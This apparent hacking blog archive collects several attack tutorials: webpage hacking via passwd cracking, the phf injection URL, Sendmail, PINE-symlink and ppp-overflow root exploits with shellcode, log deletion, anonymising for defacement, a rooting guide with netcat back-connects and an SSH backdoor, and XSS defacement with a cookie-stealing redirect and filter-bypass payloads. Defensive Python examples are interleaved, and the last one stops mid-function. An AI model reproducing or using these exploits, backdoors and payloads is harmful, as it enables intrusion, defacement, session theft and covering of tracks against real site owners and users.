
Saturday, 30 January 2016

The Ultimate Guide Hacking Webpages


Hacking Webpages
The Ultimate Guide

One of the most helpful Unix text files in cyberspace, but with the mail that we received after the release of our famous 36-page Unix Bible we realised that Unix isn't for everybody, so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic are proud to release "Hacking Webpages With a few Other Techniques." We will discuss a few different ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.

Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need to learn a little about the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little difference: it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker (both explained later in the text). Below is another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password, or sometimes they are disguised as an * as well.

Now that you know a little more about what the actual password file looks like, you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system.

1. The first step that you would take is to download or copy the file.

2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added). We will be releasing our password file to the public soon; it will be called Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation.

3. You then start up the cracker and follow the directions that it gives you.
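As an added example (not part of the original text), the following Python script applies the distinction drawn above to the post's own sample entries: it parses each passwd line, reports whether the password field is shadowed or still carries a hash, and flags the two conditions an administrator reviewing such a file cares about most, a hash sitting in the world-readable passwd file and a second uid 0 account. The sample input is copied from the post's examples plus one constructed passwordless "guest" entry.

```python
from dataclasses import dataclass
from typing import List, Optional

# Password-field markers meaning "no hash here: look in /etc/shadow, or the account is locked".
SHADOW_MARKERS = {"x", "*", "!", "!!", "*LK*", "NP"}


@dataclass
class PasswdEntry:
    name: str
    pw_field: str
    uid: Optional[int]
    gid: Optional[int]
    gecos: str
    home: str
    shell: str


def parse_passwd_line(line: str) -> Optional[PasswdEntry]:
    """Split one passwd line into its seven colon-separated fields; None if malformed."""
    parts = line.rstrip("\n").split(":")
    if len(parts) != 7:
        return None
    name, pw, uid, gid, gecos, home, shell = parts
    return PasswdEntry(
        name=name,
        pw_field=pw,
        uid=int(uid) if uid.isdigit() else None,
        gid=int(gid) if gid.isdigit() else None,
        gecos=gecos,
        home=home,
        shell=shell,
    )


def classify_password_field(entry: PasswdEntry) -> str:
    """'shadowed' (x, *, ...), 'hashed' (a crypt string sits right here) or 'empty'."""
    if entry.pw_field == "":
        return "empty"
    if entry.pw_field in SHADOW_MARKERS:
        return "shadowed"
    return "hashed"


def audit_passwd(text: str) -> List[str]:
    """Return one finding per risky entry; an empty list means nothing to report."""
    findings: List[str] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        entry = parse_passwd_line(line)
        if entry is None:
            findings.append(f"line {lineno}: malformed entry (expected 7 fields)")
            continue
        kind = classify_password_field(entry)
        if kind == "hashed":
            findings.append(f"line {lineno}: {entry.name} keeps its hash in passwd; move it to /etc/shadow")
        elif kind == "empty":
            findings.append(f"line {lineno}: {entry.name} has an empty password field")
        if entry.uid == 0 and entry.name != "root":
            findings.append(f"line {lineno}: {entry.name} has uid 0 (a second superuser account)")
    return findings


# Sample input: lines copied from the post's examples, plus one constructed 'guest' entry.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:1:Superuser:/:",
    "ftp:x:202:102:Anonymous ftp:/u1/ftp:",
    "ftpadmin:x:203:102:ftp Administrator:/u1/ftp",
    "BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh",
    "smtp:x:0:0:mail daemon user:/:",
    "guest::1500:1500:Guest (constructed):/home/guest:/bin/sh",
])

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Run against the sample it reports four findings: the truncated ftpadmin line, BBob's in-file hash, the post's own smtp entry (which carries uid 0 in the shadowed example above) and the constructed empty-password account.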

The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file (if it works).
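The request shape shown above is easy to spot in a web server's access log, because the trick depends on a URL-encoded newline (%0a) reaching a CGI program. As an added example that is not part of the original text, this Python scanner decodes each request target and flags CGI requests whose query carries a newline, naming the phf case specifically. The log lines are constructed for the example (Common Log Format), with the phf request copied from the URL in the post.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# One Common Log Format line: client, identd, user, [timestamp], "METHOD target PROTOCOL", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)


def cgi_newline_injection(target: str) -> str:
    """Return a reason string if the request smuggles a newline into a CGI query, else ''."""
    path, _, query = target.partition("?")
    if "/cgi-bin/" not in path:
        return ""
    decoded = unquote(query)  # %0a and %0A both decode to a newline
    if "\n" not in decoded and "\r" not in decoded:
        return ""
    if path.endswith("/phf"):
        return "phf newline injection (%0a) in query string"
    return "newline injected into CGI query string"


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Return one record per suspicious request, in log order."""
    hits: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = cgi_newline_injection(m["target"])
        if reason:
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "target": m["target"],
                "status": m["status"],
                "reason": reason,
            })
    return hits


# Constructed sample log; line 2 mirrors the phf URL quoted in the post.
SAMPLE_ACCESS_LOG = "\n".join([
    '10.0.0.5 - - [30/Jan/1996:10:15:01 +0000] "GET /index.html HTTP/1.0" 200 2048',
    '10.0.0.9 - - [30/Jan/1996:10:15:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1337',
    '10.0.0.9 - - [30/Jan/1996:10:16:22 +0000] "GET /cgi-bin/search?q=a%0Ab HTTP/1.0" 200 512',
    '10.0.0.7 - - [30/Jan/1996:10:17:40 +0000] "GET /cgi-bin/search?q=unix+bible HTTP/1.0" 200 512',
])

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["reason"], hit["target"])
```

The status and size columns matter when triaging a hit: a 200 with a non-trivial body on the phf line is the case where the script actually ran, while a 404 means the program was already removed.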

Telnet and Exploits

Well exploits are the best way of hacking webpages but they are also more complicated than hacking through ftp or using the phf. Before you can set up an exploit you must first have a telnet program; there are many different clients, you can just do a netsearch and find everything you need.
It's best to get an account with your target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each separately. I'm going to list a few below but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4. It creates a suid program /tmp/x that calls a shell as root. This is how you set it up:

cat << _EOF_ >/tmp/x.c
 #define RUN "/bin/ksh"
 #include<stdio.h>
 main()
 {
    execl(RUN,RUN,NULL);
 }
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
 main()
 {
   execl("/usr/lib/sendmail","/tmp/smtpd",0);    
 }                                            
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
 main()
 {
   setuid(0); setgid(0);
   system("chown root /tmp/x ;chmod 4755 /tmp/x");
 }
_EOF_
#
#
gcc -O  -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
   echo "leet..."
   /tmp/x
fi

and now on to another exploit. I'm going to display the pine exploit through Linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.

Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

This was written by Sean B. Hamor... For this example, hamors is the victim while catluvr is the attacker:

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep pine
hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
-rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep pine
hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
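The whole transcript hinges on one programming mistake: the lockfile is created with a plain open() that follows whatever already exists at the path, so a pre-planted symlink redirects the write into the victim's home directory. As an added example (not from the post or from PINE), the Python below replays that scenario in a private temporary directory and contrasts the naive write with one that uses O_CREAT|O_EXCL|O_NOFOLLOW, which refuses to create through an existing symlink and creates the file mode 0600 when the path is genuinely free. File names are stand-ins chosen for the example.

```python
import errno
import os
import shutil
import tempfile
from typing import Dict


def write_lockfile_naively(path: str, contents: str) -> None:
    """The pattern the transcript exploits: open() follows whatever already sits at `path`."""
    with open(path, "w") as fh:
        fh.write(contents)


def write_lockfile_safely(path: str, contents: str) -> None:
    """Create the file only if nothing (not even a dangling symlink) is already at `path`.

    O_EXCL makes creation fail when the path exists, a symlink included, and
    O_NOFOLLOW refuses to traverse a symlink at the final path component."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)   # mode is applied at creation, before any write
    with os.fdopen(fd, "w") as fh:
        fh.write(contents)


def demo_symlink_race() -> Dict[str, bool]:
    """Replay the post's scenario in a private temp dir and report what each variant did."""
    workdir = tempfile.mkdtemp(prefix="lockdemo-")   # our own dir, so no sticky-bit symlink protection applies
    target = os.path.join(workdir, "victim_rhosts")  # stands in for ~hamors/.rhosts
    lock = os.path.join(workdir, ".lockfile")        # stands in for /tmp/.302.f5a4
    fresh = os.path.join(workdir, ".lockfile2")      # a path nobody has tampered with
    results: Dict[str, bool] = {}
    try:
        # The pre-planted dangling symlink, as in the transcript's `ln -s` step.
        os.symlink(target, lock)

        write_lockfile_naively(lock, "1756")
        results["naive_wrote_through_symlink"] = (
            os.path.exists(target) and open(target).read() == "1756"
        )

        try:
            write_lockfile_safely(lock, "1756")
            results["safe_refused_symlink"] = False
        except OSError as exc:
            results["safe_refused_symlink"] = exc.errno in (errno.EEXIST, errno.ELOOP)

        write_lockfile_safely(fresh, "1756")
        results["safe_created_private_file"] = (os.stat(fresh).st_mode & 0o777) == 0o600
    finally:
        shutil.rmtree(workdir, ignore_errors=True)
    return results


if __name__ == "__main__":
    for name, ok in demo_symlink_race().items():
        print(f"{name}: {ok}")
```

The private directory is deliberate: modern Linux systems with fs.protected_symlinks enabled already block the naive write inside sticky world-writable directories such as /tmp, so running the demo there would hide the bug rather than show it.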

now on to another one, this will be the last one that I'm going to show. Exploitation script for the ppp vulnerability as described by no one to date; this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesn't work. This is how you set it up:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memset */
#include <unistd.h>

#define BUFFER_SIZE     156     /* size of the buffer to overflow */

#define OFFSET          -290    /* number of bytes to jump after the start
                                   of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

int main(int argc, char *argv[])
{
        char *buf = NULL;
        unsigned long *addr_ptr = NULL;
        char *ptr = NULL;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20 bytes */
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */
 
        int i,j;

        buf = malloc(4096);

        /* fill start of buffer with nops */

        i = BUFFER_SIZE-strlen(execshell);

        memset(buf, 0x90, i);
        ptr = buf + i;

        /* place exploit code into the buffer */

        for(i = 0; i < strlen(execshell); i++)
                *ptr++ = execshell[i];

        addr_ptr = (long *)ptr;
        for(i=0;i < (104/4); i++)
                *addr_ptr++ = get_esp() + OFFSET;

        ptr = (char *)addr_ptr;
        *ptr = 0;

        setenv("HOME", buf, 1);

        execl("/usr/sbin/ppp", "ppp", NULL);
}

Now that you've gotten root, "what's next?" Well the choice is up to you, but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while; you can now upload your pages, delete all the logs and just plain do your worst :) Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learning ethical hacking that you download our Unix Bible.


Sunday, 29 April 2012

Stay Anonymous And Secure by SSH Tunneling + TOR [PICTURES]


Hello All,
I know all of you are scared to hack/deface a website without taking precautions.
Most of you must not have a good VPN which is paid and secure enough to do illegal stuff. So today I will teach you how to stay completely secure without using any VPN :)

So first, I would just tell some problems of free VPNs:
They are slow and contain ads in most cases
Limited number of proxies
Very insecure
Store logs
Easily Traceable using Logs
Even when they say they do not store logs,they do it
They are not reliable


Tools Needed
TOR
PuTTY

TOR
Free software implementation of second-generation onion routing, a system enabling its users to communicate anonymously on the Internet.



PuTTY
PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator.



Open PuTTY.
In The Category, choose Session.
In the Host Name,Type shellmix.com.
Type Port as 30.
Connection Type : SSH.
Now Click Open.
A Black Window will appear.
Enter username and password as "newuser" [The password appears blank but it is typed]



A Black Window Appears
Now enter a Login Name.
Enter a Password.
Enter another password For MySQL Database.
Enter Email Address.
Choose Editor and Enter pico.
Choose language : Enter us.
Choose Vhost : Enter shell.
Enter HDD : Enter hdd1 or hdd2.
Now press Enter to Continue.
Now, your shell account is ready. Make sure you remember the username and password you created.




SSH TUNNELING
Re-Open PuTTY.
Hostname : shellmix.com.
Port : 22.
Now in category on the left,choose SSH.
Expand it and select Tunnel.
Destination : Dynamic.
Port : Any random port. (Example : 4545)
Click Add.


Click Open.
Enter Login name and Password that you created earlier
Leave this window open
Open TOR
Click Firefox > Options > Advanced > Network > Settings
Click Manual Proxy Configuration
Socks Host : 127.0.0.1
Port : 4545 (The port you used earlier in PuTTY)
Click OK
SSH Tunnel Is Ready. Go to http://www.ip2location.com/ and verify your fake IP







Thanks for reading my tutorial
Hope you will comment like and rep :)

Tuesday, 27 December 2011

Learn Root - Totally Explained






#So Lets Start...

These are some basic questions asked by myself as a n00b :P

# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.


# What is the need of rooting ?
A. Getting master admin privileges on servers



Things you need



# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain

Simply you can search on http://www.google.com for these, except BRAIN and SHELL



Getting Back Connection to the servers


Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok, open your shell in your browser and go to the back connection tab; if it is not there get a shell like "WSO 2.3" or any other,
that's your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now come back to netcat and type "nc -l -v -p 2121"

it will give you this output:
Code:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...


Getting a Right exploit for the servers


Type: uname -a & hit enter.
It'll look something like this:

Code:
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted it shows the kernel version of the server is: 2.6.18-194.26.1.el5
& the year is 2010.

You need to find a perfect exploit for it. You can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com
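The same `uname -a` line the post reads by eye is what a patch-management check parses automatically: pull out the kernel release and compare it against the release your vendor's errata say is current. As an added example (not part of the post), this Python parser handles the exact line quoted above and compares release strings component by component; the baseline value is a constructed placeholder, not a statement about any real advisory.

```python
import re
from typing import NamedTuple, Tuple


class KernelInfo(NamedTuple):
    hostname: str
    release: str
    build_date: str
    arch: str


# `uname -a` on Linux: "Linux <host> <release> #<build> [SMP] <date> <machine> <processor> <hw-platform> GNU/Linux"
UNAME_RE = re.compile(
    r"^Linux\s+(?P<host>\S+)\s+(?P<release>\S+)\s+#\d+\s+(?:SMP\s+)?"
    r"(?P<date>.+?)\s+(?P<arch>\S+)\s+\S+\s+\S+\s+GNU/Linux$"
)


def parse_uname(line: str) -> KernelInfo:
    """Parse one `uname -a` line; raises ValueError if it is not in the Linux layout above."""
    m = UNAME_RE.match(line.strip())
    if not m:
        raise ValueError("not a Linux `uname -a` line")
    return KernelInfo(m["host"], m["release"], m["date"], m["arch"])


def release_key(release: str) -> Tuple[int, ...]:
    """'2.6.18-194.26.1.el5' -> (2, 6, 18, 194, 26, 1): upstream version first, then the distro build.

    Non-numeric tokens such as 'el5' are dropped so tuples compare cleanly."""
    base, _, build = release.partition("-")
    nums = [int(p) for p in base.split(".") if p.isdigit()]
    nums += [int(p) for p in build.split(".") if p.isdigit()]
    return tuple(nums)


def is_behind(release: str, baseline: str) -> bool:
    """True when `release` is older than the `baseline` release you expect hosts to run."""
    return release_key(release) < release_key(baseline)


# The line quoted in the post.
SAMPLE_UNAME = (
    "Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP "
    "Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux"
)

# Constructed placeholder: substitute the release from your vendor's current errata.
EXPECTED_RELEASE = "2.6.18-238.el5"

if __name__ == "__main__":
    info = parse_uname(SAMPLE_UNAME)
    verdict = "behind baseline" if is_behind(info.release, EXPECTED_RELEASE) else "at or above baseline"
    print(f"{info.hostname}: {info.release} ({info.arch}, built {info.build_date}) is {verdict}")
```

A host that is "behind baseline" in this check is one whose kernel predates the release the vendor ships fixes in, which is the same signal the post reads off the version string, turned into an inventory rule an administrator can run across a fleet.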


Compiling & executing exploits


Now I've got an exploit, & it is written in C. So I can't execute it by just uploading, I need to compile it.

Before proceeding further, cd into the tmp directory, because it is always writable. So type: cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, so I type: wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

Code:
admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net... 199.58.192.192
Connecting to www.exploitsite.net|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'



now change the permission of the exploit to 777.
Type: "chmod 777 exploit.c"

Now the exploit is on my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

The next step is to execute it, so we'll type: "./exploit"


here it'll show different process...
: #
: #
got root you m0f0 !! [<example]


Now it says got root. Let's check whether it's true,
Type: "whoami"

then it will say
 "root"

like: uid=0(root) gid=0(root) groups=0(root)

type "su" to get full privilages !


Installing Backdoors

type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"


Then type,
unzip sshdoor.zip
Then, => cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.

Now connect with putty & enjoy root privileges. 


Methods to execute exploits written in other languages


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------


Just for Education Purpose !!

Saturday, 3 September 2011

Cross Site Scripting (XSS) N00b

To start finding these vulnerabilities you can start checking out blogs, forums, shoutboxes, comment boxes, search boxes; there are too many to mention.

Using 'Google Dorks' makes the finding easier. Ok, if you wanna get cracking, go to google.com and type inurl:"search.php?q=". Now that is a common page and has a lot of results. Also note that most sites have XSS vulnerabilities; it's just having a good eye, and some good knowledge on how to bypass their filtration.

Basics of XSS
Well now let's start learning some actual methods. The most commonly used XSS injection is:

<script>alert("W1n_h4ck3r")</script>

now this will alert a popup message saying "W1n_h4ck3r" without quotes.

So, use "search.php?q=" and you can simply try the following on a website with the same thing,

http://website.com/search.php?q=<script>alert("W1n_h4ck3r")</script>

There are good chances of it working, but don't be worried if it doesn't, just try different sites. You can insert HTML, not just JavaScript:

http://website.com/search.php?q=<br><br><b><u>W1n_h4ck3r</u></b>



How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods. There are many ways for defacing; I will mention some of the best and most used, the first one being IMG SRC. Now for those of you who don't know HTML, IMG SRC is a tag that displays the IMAGE linked to it on the webpage.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

ok now if you change the link to a valid picture link, and save it and run it you will see what I mean. Right, now say you have found a shoutbox, comment box, or anything that shows your data after you submitted it, you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed as the page will already have them. Ok it helps to make your picture big so it stands out and it's clear the site got hacked. Another method is using FLASH videos; it's the same as the method below but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf">

That will execute the flash video linked to it. Or maybe using a popup or redirection as:
<script>window.open( "http://tools-andtipsbywinhacker.blogspot.com/" )</script>

There are many other ways that you can find using Google or other websites. My purpose is to make you understand the concept :)

How to Cookie Stealing using XSS ?
I decided to add this as it's the most useful method of XSS. First learn how to make a cookie logger from here: How To Make A Cookie Stealer Php script ?

ok now you have it, save it as a .php file and upload it to your server; remember to create the file 'log.txt' too and chmod it to 777. Ok, now find an XSS vulnerable website; any attack type will do. Now you're gonna want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


or


document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

now when a user visits the page that got injected, they will be sent to the site and the cookie will be stolen; the second one is more stealthy. Watch your file now for cookies, then you can hijack their session :D

but now you ask, what if my site has not got this kind of attack, it only shows data once and doesn't store it. Well let's say we had a page search.php?q=; we can use the following code to make a malicious URL from it and maybe hex or base64 encode it so people can't see the code

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


How to Bypass Filtration ?

A lot of sites may seem vulnerable but do not execute the code; well to solve this read this. Some common methods to bypass filtration are

')alert('xss');


or


");alert('xss');

that will do the same thing as <script>alert("XSS")</script> on a vulnerable server. You can also try hexing or base64 encoding your data before you submit. Please note it's bad practice to use alert("XSS") to test for XSS, because some sites block the keyword "XSS", so we use "W1n_h4ck3r".

Some other ways to bypass filtration
website.com/search.php?q="><script>alert('W1n_h4ck3r')</script>
website.com/search.php?q="><script>alert("W1n_h4ck3r")</script>
website.com/search.php?q="><script>alert("W1n_h4ck3r");</script>
website.com/search.php?q="><script>alert(/W1n_h4ck3r");</script>
website.com/search.php?q=//"><script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=abc<script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=abc"><script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=abc"></script><script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=abc//abc"></script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=000"><script></script><script>alert(W1n_h4ck3r);</script>
website.com/search.php?q=000abc</script><script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=--<script>"></script>alert(/W1n_h4ck3r/);</script>
website.com/search.php?q=pwned<script>document.write('W1n_h4ck3r');</script>
website.com/search.php?q=pwned</script><script>document.write(W1n_h4ck3r);</script>
website.com/search.php?q=pwned')alert(W1n_h4ck3r);//
website.com/search.php?q=pwned";)alert(W1n_h4ck3r);//
website.com/search.php?q=pwned");alert(/W1n_h4ck3r/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/W1n_h4ck3r/);</script>
website.com/search.php?q="><img src='javascript:alert('W1n_h4ck3r');'>
website.com/search.php?q="><script src='http://Evil js'</script>


Advanced XSS - way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniques. I have come across many sites where 'Magic Quotes' is on, therefore rendering some commands useless. Fear not, I have come up with a way using char codes (decimals), to convert char codes to ASCII. For the functions to turn char codes (decimals) into ASCII, you can find a complete table here

ASCII LINK
ASCII LINK 2

This will help you write what you want. In my examples I'll be writing "HOC"; this is the following code

72 79 67

Ok now we've got the decimal value of our string, we need to know what function in JavaScript converts this.

String.fromCharCode()

is suitable for this kind of thing; it's easy to set up, I'm gonna give it my args below.

String.fromCharCode(72, 79, 67)

Ok now "String.fromCharCode(72, 79, 67)" is a JavaScript (ASCII) way of saying "HOC". And to use this with alerts etc., you don't need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(72, 79, 67))</script>
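The filter-bypass list and the magic-quotes section above make one point between them: keyword stripping and quote escaping defend against particular strings, not against the underlying problem, which is that user input reaches the page in an HTML context without being encoded for that context. As an added example (not from the post), the Python below renders a search page two ways, through the kind of keyword blacklist and magic-quotes transform the post describes and through contextual HTML escaping, then counts which tags each variant lets through. The payloads are copied from the post and used purely as test inputs; the page template is constructed for the example.

```python
import html
from html.parser import HTMLParser
from typing import Callable, Dict, List, Set

# Test inputs copied from the post's own examples.
PAYLOADS: List[str] = [
    '<script>alert("W1n_h4ck3r")</script>',
    '<br><br><b><u>W1n_h4ck3r</u></b>',
    '<IMG SRC="http://site.com/yourDefaceIMAGE.png">',
    '"><script>alert(/W1n_h4ck3r/);</script>',
    '<script>alert(String.fromCharCode(72, 79, 67))</script>',
]

# Tags the constructed search page legitimately contains.
TEMPLATE_TAGS = {"p", "input"}


def blacklist_filter(q: str) -> str:
    """Keyword stripping of the kind the post says some sites use."""
    for bad in ("<script>", "</script>", "XSS"):
        q = q.replace(bad, "")
    return q


def magic_quotes(q: str) -> str:
    """PHP-style magic quotes: backslash-escape quotes; does nothing to angle brackets."""
    return q.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def contextual_escape(q: str) -> str:
    """Encode for an HTML text node or a double-quoted attribute value."""
    return html.escape(q, quote=True)


def render(q: str, sanitizer: Callable[[str], str]) -> str:
    """Echo the query in two places: page text and an attribute value (both common sinks)."""
    s = sanitizer(q)
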